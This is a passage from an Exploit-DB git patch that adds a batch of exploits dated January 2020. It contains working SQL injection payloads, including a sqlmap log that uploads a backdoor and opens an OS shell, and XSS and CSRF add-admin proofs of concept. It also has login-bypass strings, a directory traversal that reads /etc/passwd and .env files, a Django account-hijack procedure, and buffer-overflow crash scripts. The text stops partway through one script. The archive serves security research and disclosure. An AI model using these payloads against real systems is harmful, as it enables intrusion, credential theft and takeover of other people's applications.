From 95c6eeab795867992db5cef8b68f8bdfd91cd3b2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 7 Jan 2020 05:02:07 +0000 Subject: [PATCH] DB: 2020-01-07 33 changes to exploits/shellcodes NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) SpotIE 2.9.5 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Key' Denial of Service (PoC) BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC) ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC) NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Name' Denial of Service (PoC) TextCrawler Pro3.1.1 - Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC) Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC) NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC) Office Product Key Finder 1.5.4 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC) SpotMSN 2.4.6 - 'Name' Denial of Service (PoC) SpotIM 2.2 - 'Name' Denial Of Service FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) Duplicate Cleaner Pro 4 - Denial of Service (PoC) Microsoft Outlook VCF cards - Denial of Service (PoC) Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path Windows - Shell COM Server Registrar Local Privilege Escalation Dairy Farm Shop Management System 1.0 - 'username' SQL Injection Complaint Management System 4.0 - 'cid' SQL injection IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) Hostel Management System 2.0 - 'id' SQL Injection elaniin CMS 1.0 - Authentication Bypass Small CRM 2.0 - Authentication Bypass Voyager 1.3.0 - Directory Traversal Codoforum 4.8.3 - Persistent Cross-Site Scripting Django < 3.0 < 2.2 < 1.11 - Account Hijack Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) --- exploits/hardware/webapps/47850.txt | 35 ++++ exploits/php/webapps/47846.txt | 164 +++++++++++++++++ exploits/php/webapps/47847.txt | 45 +++++ exploits/php/webapps/47851.txt | 138 ++++++++++++++ exploits/php/webapps/47854.txt | 49 +++++ exploits/php/webapps/47858.txt | 30 ++++ exploits/php/webapps/47874.txt | 35 ++++ exploits/php/webapps/47875.txt | 50 ++++++ exploits/php/webapps/47876.txt | 22 +++ exploits/python/webapps/47879.md | 31 ++++ exploits/windows/dos/47848.py | 33 ++++ exploits/windows/dos/47853.py | 33 ++++ exploits/windows/dos/47855.py | 33 ++++ exploits/windows/dos/47856.py | 33 ++++ exploits/windows/dos/47857.py | 33 ++++ exploits/windows/dos/47859.py | 33 ++++ exploits/windows/dos/47860.py | 33 ++++ exploits/windows/dos/47861.py | 33 ++++ exploits/windows/dos/47862.py | 28 +++ exploits/windows/dos/47863.py | 33 ++++ exploits/windows/dos/47864.py | 33 ++++ exploits/windows/dos/47865.py | 33 ++++ exploits/windows/dos/47866.py | 33 ++++ exploits/windows/dos/47867.py | 63 +++++++ exploits/windows/dos/47868.py | 33 ++++ exploits/windows/dos/47869.py | 33 ++++ exploits/windows/dos/47870.py | 33 ++++ exploits/windows/dos/47871.txt | 153 ++++++++++++++++ exploits/windows/dos/47873.py | 26 +++ exploits/windows/dos/47878.txt | 93 ++++++++++ exploits/windows/local/47852.txt | 24 +++ exploits/windows/local/47880.cc | 270 ++++++++++++++++++++++++++++ files_exploits.csv | 32 ++++ files_shellcodes.csv | 1 + shellcodes/linux/47877.c | 109 +++++++++++ 35 files changed, 1893 insertions(+) create mode 100644 exploits/hardware/webapps/47850.txt create mode 100644 exploits/php/webapps/47846.txt create mode 100644 exploits/php/webapps/47847.txt create mode 100644 exploits/php/webapps/47851.txt create mode 100644 exploits/php/webapps/47854.txt create mode 100644 exploits/php/webapps/47858.txt create mode 100644 exploits/php/webapps/47874.txt create mode 100644 exploits/php/webapps/47875.txt create mode 100644 exploits/php/webapps/47876.txt create mode 100644 exploits/python/webapps/47879.md create mode 100755 exploits/windows/dos/47848.py create mode 100755 exploits/windows/dos/47853.py create mode 100755 exploits/windows/dos/47855.py create mode 100755 exploits/windows/dos/47856.py create mode 100755 exploits/windows/dos/47857.py create mode 100755 exploits/windows/dos/47859.py create mode 100755 exploits/windows/dos/47860.py create mode 100755 exploits/windows/dos/47861.py create mode 100755 exploits/windows/dos/47862.py create mode 100755 exploits/windows/dos/47863.py create mode 100755 exploits/windows/dos/47864.py create mode 100755 exploits/windows/dos/47865.py create mode 100755 exploits/windows/dos/47866.py create mode 100755 exploits/windows/dos/47867.py create mode 100755 exploits/windows/dos/47868.py create mode 100755 exploits/windows/dos/47869.py create mode 100755 exploits/windows/dos/47870.py create mode 100644 exploits/windows/dos/47871.txt create mode 100755 exploits/windows/dos/47873.py create mode 100644 exploits/windows/dos/47878.txt create mode 100644 exploits/windows/local/47852.txt create mode 100644 exploits/windows/local/47880.cc create mode 100644 shellcodes/linux/47877.c diff --git a/exploits/hardware/webapps/47850.txt b/exploits/hardware/webapps/47850.txt new file mode 100644 index 000000000..66d635d1b --- /dev/null +++ b/exploits/hardware/webapps/47850.txt @@ -0,0 +1,35 @@ +# Exploit Title: IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting +# Date: 2020-01-02 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.ibm.com/il-en +# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-476&appname=USN +# Vulernability Type: Cross-site Scripting +# Vulenrability: Stored XSS +# CVE: N/A + +# Description : +# Ricoh (IBM) InfoPrint 1532 devices allow Stored XSS via the 1.network.6.10 parameter to the +# cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html URI. (HTML Injection can also occur.) + +HTTP Request : + +POST /cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html HTTP/1.1 +Host: 134.84.35.70 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 281 +Origin: https://134.84.35.70 +Connection: close +Referer: https://134.84.35.70/cgi-bin/dynamic/config/gen/general.html +Upgrade-Insecure-Requests: 1 + +0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30&0.printer.4.258=1&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0&0.network.10.73=120&1.printer.1.40= + +HTTP Response : + +HTTP/1.0 200 OK +Content-Type: text/html +Content-Length: 269 \ No newline at end of file diff --git a/exploits/php/webapps/47846.txt b/exploits/php/webapps/47846.txt new file mode 100644 index 000000000..42c8beaed --- /dev/null +++ b/exploits/php/webapps/47846.txt @@ -0,0 +1,164 @@ +# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection +# Google Dork: N/A +# Date: 2020-01-03 +# Exploit Author: Chris Inzinga +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ +# Version: v1.0 +# Tested on: Windows +# CVE: N/A + +# The Dairy Farm Shop Management System 1.0 web application is vulnerable to +# SQL injection in multiple areas. The most severe of these is the username +# parameter on the login page as this injection can be done unauthenticated. + + +================================ 'username' - SQLi ================================ + +POST /dfsms/index.php HTTP/1.1 +Host: 192.168.0.33 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.0.33/dfsms/index.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 34 +Connection: close +Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg +Upgrade-Insecure-Requests: 1 + +username=test&password=test&login= + +--- +Parameter: username (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login= +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 + + + +================================ 'category' & 'categorycode' - SQLi ================================ + +POST /dfsms/add-category.php HTTP/1.1 +Host: 192.168.0.33 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.0.33/dfsms/add-category.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 39 +Connection: close +Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg +Upgrade-Insecure-Requests: 1 + +category=test&categorycode=test&submit= + +--- +Parameter: category (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit= +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 + +--- +Parameter: categorycode (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit= +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 + + + +================================ 'companyname' - SQLi ================================ + +--- +Parameter: companyname (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit= +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 + + + +================================ 'productname' & 'productprice' - SQLi ================================ + +--- +Parameter: productname (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit= +--- +--- +Parameter: productprice (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit= +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 + + + +================================ 'fromdate' & 'todate' - SQLi ================================ + +--- +Parameter: todate (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit= + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit= + + Type: UNION query + Title: MySQL UNION query (NULL) - 5 columns + Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit= + +Parameter: fromdate (POST) + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit= +--- + + + +================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================ + +--- +Parameter: emailid (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update= +--- +--- +Parameter: adminname (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update= +--- +--- +Parameter: mobilenumber (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update= +--- \ No newline at end of file diff --git a/exploits/php/webapps/47847.txt b/exploits/php/webapps/47847.txt new file mode 100644 index 000000000..23ba25eb4 --- /dev/null +++ b/exploits/php/webapps/47847.txt @@ -0,0 +1,45 @@ +# Exploit Title: Complaint Management System 4.0 - 'cid' SQL injection +# Google Dork: N/A +# Date: 2020-01-03 +# Exploit Author: FULLSHADE +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/complaint-management-sytem/ +# Version: v4.0 +# Tested on: Windows 7 +# CVE : N/A + +Description: + +The Complaint Management System v4.0 application from PHPgurukul is vulnerable to +blind SQL injection via the 'cid' parameter which is found on the complaint-details.php +page. + +========== 1. SQLi ========== + +SQLMAP POC: + +GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n +sqlmap identified the following injection point(s) with a total of 1748 HTTP(s) requests: +--- +Parameter: cid (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: cid=2'+(SELECT 0x7648556f WHERE 4476=4476 AND SLEEP(5))+' +--- + +The ?cid parameter is vulnerable to sql injection within the + +the vulnerable URL = https://10.0.0.214/complaint%20management%20system/cms/admin/complaint-details.php?cid=2 + +request: + +GET /complaint%20management%20system/cms/admin/complaint-details.php?cid=2 HTTP/1.1 +Host: 10.0.0.214 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Cookie: PHPSESSID=5bmri9rlp1jvrjkhgumn7v9fot +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/php/webapps/47851.txt b/exploits/php/webapps/47851.txt new file mode 100644 index 000000000..f92a9321b --- /dev/null +++ b/exploits/php/webapps/47851.txt @@ -0,0 +1,138 @@ +# Exploit Title: Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-01-05 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://intelliants.com/ +# Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5 +# Software : Subrion CMS +# Product Version: v 4.0.5.10 +# Vulernability Type : Cross-Site Request Forgery (Add Admin) +# Vulenrability : Cross-Site Request Forgery +# CVE : N/A + +# Description : +# CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS. +# With this vulnerability, authorized users can be added to the system. + +HTML CSRF PoC : + + + + + +
+ +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/47854.txt b/exploits/php/webapps/47854.txt new file mode 100644 index 000000000..9e0da880b --- /dev/null +++ b/exploits/php/webapps/47854.txt @@ -0,0 +1,49 @@ +# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection +# Google Dork: intitle: "Hostel management system" +# Date: 2020-01-03 +# Exploit Author: FULLSHADE +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/hostel-management-system/ +# Version: v2.0 +# Tested on: Windows +# CVE : N/A + +Description: + +The Hostel Management System v2.0 application from PHPgurukul is vulnerable to +SQL injection via the 'id' parameter on the full-profile.php page. + +==================== 1. SQLi ==================== + +http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1 + +THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated +user has the full ability to run system commands via --os-shell and fully compromise the system + +GET parameter 'id' is vulnerable. + +--- +Parameter: id (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + Payload: id=-3444' OR 1650=1650# + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ + + Type: time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: id=1' OR SLEEP(5)-- slKU + + Type: UNION query + Title: MySQL UNION query (NULL) - 29 columns + Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# + +[14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php +[14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php +[14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER +os-shell> whoami +do you want to retrieve the command standard output? [Y/n/a] y +command standard output: 'john-pc\john' +os-shell> \ No newline at end of file diff --git a/exploits/php/webapps/47858.txt b/exploits/php/webapps/47858.txt new file mode 100644 index 000000000..d77166077 --- /dev/null +++ b/exploits/php/webapps/47858.txt @@ -0,0 +1,30 @@ +# Exploit Title: elaniin CMS 1.0 - Authentication Bypass +# Author: riamloo +# Date: 2020-01-02 +# Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ ) +# Software Link: https://github.com/elaniin/CMS/archive/master.zip +# Version: 1 +# CVE: N/A +# Tested on: Win 10 + +# Discription: +# Open-source Content Management System created with PHP + MySQL https://elaniin.com/ +# Vulnerability: Attacker can bypass login page and access to dashboard page +# vulnerable file : login.php +# Parameter & Payload: '=''or' +# Proof of Concept: +http://localhost/elaniin/login.php + +POST /elaniin/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +Content-Length: 334 +Referer: http://localhost/elaniin/login.php +Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8 +Connection: close +Upgrade-Insecure-Requests: 1 +email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN \ No newline at end of file diff --git a/exploits/php/webapps/47874.txt b/exploits/php/webapps/47874.txt new file mode 100644 index 000000000..ddebaebfd --- /dev/null +++ b/exploits/php/webapps/47874.txt @@ -0,0 +1,35 @@ +# Exploit Title: Small CRM 2.0 - Authentication Bypass +# Google Dork: N/A +# Date: 2020-01-02 +# Exploit Author: FULLSHADE +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/small-crm-php/ +# Version: V2.0 +# Tested on: Windows +# CVE : N/A + +# Description: +# +# There is a SQL injection vulnerability in the /index.php page +# which allows for an attacker to use the SQLi login bypass payload +# '=''or' for both the username and password parameters, this allows +# for any authenticated or low level user to login to the admin account. + +========== 1. Authentication bypass ========== + +POST /Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php HTTP/1.1 +Host: 10.0.0.214 +User-Agent: Mozilla/5.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 57 +Origin: http://10.0.0.214 +DNT: 1 +Connection: close +Referer: http://10.0.0.214/Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php +Cookie: PHPSESSID=k5845lo7s90it5p33js75665jq +Upgrade-Insecure-Requests: 1 + +email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&login= \ No newline at end of file diff --git a/exploits/php/webapps/47875.txt b/exploits/php/webapps/47875.txt new file mode 100644 index 000000000..083fa87e9 --- /dev/null +++ b/exploits/php/webapps/47875.txt @@ -0,0 +1,50 @@ +# Exploit Title: Voyager 1.3.0 - Directory Traversal +# Google Dork: N/A +# Date: January 2020-01-06 +# Exploit Author: NgoAnhDuc +# Vendor Homepage: https://voyager.devdojo.com/ +# Software Link:https://github.com/the-control-group/voyager/releases/tag/v1.3.0https://github.com/the-control-group/voyager/releases/tag/v1.2.7 +# Version: 1.3.0 and bellow +# Tested on: Ubuntu 18.04 +# CVE : N/A + + +Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php + +======================================== + +public function assets(Request $request) + { + *$path = str_start(str_replace(['../', './'], '', +urldecode($request->path)), '/');* +* $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);* + if (File::exists($path)) { + $mime = ''; + if (ends_with($path, '.js')) { + $mime = 'text/javascript'; + } elseif (ends_with($path, '.css')) { + $mime = 'text/css'; + } else { + $mime = File::mimeType($path); + } + $response = response(File::get($path), 200, +['Content-Type' => $mime]); + $response->setSharedMaxAge(31536000); + $response->setMaxAge(31536000); + $response->setExpires(new \DateTime('+1 year')); + return $response; + } + return response('', 404); + } +======================================== + +PoC: + +passwd: + +http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd + + +Laravel environment +file:http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F/.env \ No newline at end of file diff --git a/exploits/php/webapps/47876.txt b/exploits/php/webapps/47876.txt new file mode 100644 index 000000000..c01fc4375 --- /dev/null +++ b/exploits/php/webapps/47876.txt @@ -0,0 +1,22 @@ +# Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting +# Google Dork: intext:"Powered by Codoforum" +# Date: 2020-01-03 +# Exploit Author: Prasanth c41m, Vyshnav Vizz +# Vendor Homepage: https://codoforum.com/index.php +# Software Link: https://codoforum.com/buy +# Version: Codoforum 4.8.3 +# Tested on: [relevant os] +# CVE : [if applicable] +# source: https://medium.com/@c41m/b2e1133c6a91? + +Codoforum is prone to a stored xss vulnerability. +An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks. +Codoforum version 4.8.3 is vulnerable. + +1. Install Codoforum 4.8.3 in a local server. +2. Goto http://localhost/index.php?u=/user/register +3. Create a user using :- + username : "> + password : password + email : c41m@email.com +4. Now goto http://localhost/admin/index.php?page=users/manage, an XSS alert popup will be triggered here. \ No newline at end of file diff --git a/exploits/python/webapps/47879.md b/exploits/python/webapps/47879.md new file mode 100644 index 000000000..00d5c24e2 --- /dev/null +++ b/exploits/python/webapps/47879.md @@ -0,0 +1,31 @@ +EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip + + +# django_cve_2019_19844_poc +PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/) + +# Requirements + +- Python 3.7.x +- PostgreSQL 9.5 or higher + +## Setup + +1. Create database(e.g. `django_cve_2019_19844_poc`) +1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`) +1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput` +1. Create the following user with `shell` command: + +```python +>>> from django.contrib.auth import get_user_model +>>> User = get_user_model() +>>> User.objects.create_user('mike123', 'mike@example.org', 'test123') +``` + +## Procedure For Reproducing + +1. Run `./manage.py runserver` +1. Open `http://127.0.0.1:8000/accounts/password-reset/` +1. Input `mıke@example.org` (Attacker's email), and click send button +1. Receive email (Check console), and reset password +1. Login as `mike123` user \ No newline at end of file diff --git a/exploits/windows/dos/47848.py b/exploits/windows/dos/47848.py new file mode 100755 index 000000000..061177e2e --- /dev/null +++ b/exploits/windows/dos/47848.py @@ -0,0 +1,33 @@ +# Exploit Title: NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install NetShareWatcher +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Name' and click on 'Ok' +6.NetShareWatcher Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47853.py b/exploits/windows/dos/47853.py new file mode 100755 index 000000000..bd7b43953 --- /dev/null +++ b/exploits/windows/dos/47853.py @@ -0,0 +1,33 @@ +# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install BlueAuditor +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Key' and click on 'Ok' +6.BlueAuditor Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47855.py b/exploits/windows/dos/47855.py new file mode 100755 index 000000000..baba1cdd5 --- /dev/null +++ b/exploits/windows/dos/47855.py @@ -0,0 +1,33 @@ +# Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install BlueAuditor +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Key' and click on 'Ok' +6.BlueAuditor Crashed +''' + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("poc.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/windows/dos/47856.py b/exploits/windows/dos/47856.py new file mode 100755 index 000000000..317ff05ae --- /dev/null +++ b/exploits/windows/dos/47856.py @@ -0,0 +1,33 @@ +# Exploit Title: Dnss Domain Name Search Software - 'Key' Denial of Service (PoC) +# Exploit Author : Ismail Tasdelen +# Exploit Date: 2020-01-06 +# Vendor Homepage : http://www.nsauditor.com/ +# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe +# Tested on OS: Windows 10 +# CVE : N/A + +''' +Proof of Concept (PoC): +======================= + +1.Download and install Dnss +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Register -> Enter Registration Code +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Key' and click on 'Ok' 